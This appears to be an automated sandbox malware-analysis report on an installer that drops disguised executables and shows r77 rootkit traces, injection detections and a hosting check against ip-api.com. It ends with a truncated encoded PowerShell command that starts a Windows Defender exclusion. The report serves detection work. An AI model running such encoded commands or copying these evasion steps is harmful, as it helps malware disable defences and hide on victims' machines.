Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Queries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Queries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\nslookup.exe

Code function: 22_2_000000014000C920 cpuid

22_2_000000014000C920

Source: C:\Users\user\AppData\Roaming\34432.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\nslookup.exe

Code function: 22_2_00000001400029E8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

22_2_00000001400029E8

Source: C:\Windows\System32\dllhost.exe

39_2_0000000140001F00

Source: C:\Users\user\Desktop\Install.exe

1_2_0040352D

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false

Contacted Domains

Name	IP	Active
ip-api.com	208.95.112.1	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line/?fields=hosting	false		high

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\34432.exe	Avira: detection malicious, Label: HEUR/AGEN.1221921
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Avira: detection malicious, Label: HEUR/AGEN.1221921

Multi AV Scanner detection for submitted file

Source: Install.exe	Virustotal: Detection: 41%			Perma Link
Source: Install.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\34432.exe	Virustotal: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Roaming\34432.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	ReversingLabs: Detection: 76%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\34432.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 22.0.nslookup.exe.140000000.2.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.10.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.0.unpack	Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.8.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.3.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.1.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.4.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.5.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.1.unpack	Avira: Label: RKIT/Agent.avskt
Source: 39.0.dllhost.exe.140000000.8.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.2.nslookup.exe.140000000.0.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.5.unpack	Avira: Label: RKIT/Agent.avskt
Source: 39.2.dllhost.exe.140000000.0.unpack	Avira: Label: RKIT/Agent.avskt
Source: 39.0.dllhost.exe.140000000.12.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.6.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.0.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.10.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.6.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.12.unpack	Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.3.unpack	Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.4.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.2.unpack	Avira: Label: RKIT/Agent.avskt

Uses 32bit PE files

Source: Install.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: Install.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source:	Binary string: x64.pdb source: svchost.exe
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe

Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405C49
Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_00406873 FindFirstFileW,FindClose,	1_2_00406873
Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140006E1C FindFirstFileExW,	22_2_0000000140006E1C
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400073C8 FindFirstFileExW,	39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,	42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BBD0E4 FindFirstFileExW,	44_2_00000240B2BBD0E4
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,	47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,	49_2_000001B8BFF4D0E4

Networking

Uses nslookup.exe to query domains

Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe			Jump to behavior

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData0I
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryux

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: powershell.exe, 00000008.00000002.303519748.000001FF69E80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.467492973.000002C8EBA50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mp
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM
